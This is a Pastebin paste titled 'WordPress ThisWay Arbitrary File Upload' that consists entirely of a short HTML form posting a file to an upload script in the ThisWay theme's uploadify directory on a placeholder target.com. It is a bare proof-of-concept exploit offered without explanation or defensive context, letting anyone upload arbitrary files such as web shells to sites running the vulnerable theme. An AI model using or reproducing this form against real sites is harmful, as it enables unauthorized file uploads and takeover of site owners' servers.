Advertisement
Guest User

WordPress ThisWay Arbitrary File Upload

a guest
Sep 5th, 2016
835
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.24 KB | None | 0 0
  1. <form action="http://target.com/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php" enctype="multipart/form-data" method="post">
  2. <input name="Filedata" type="file" />
  3. <input name="submit" type="submit" value="Submit" />
  4. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement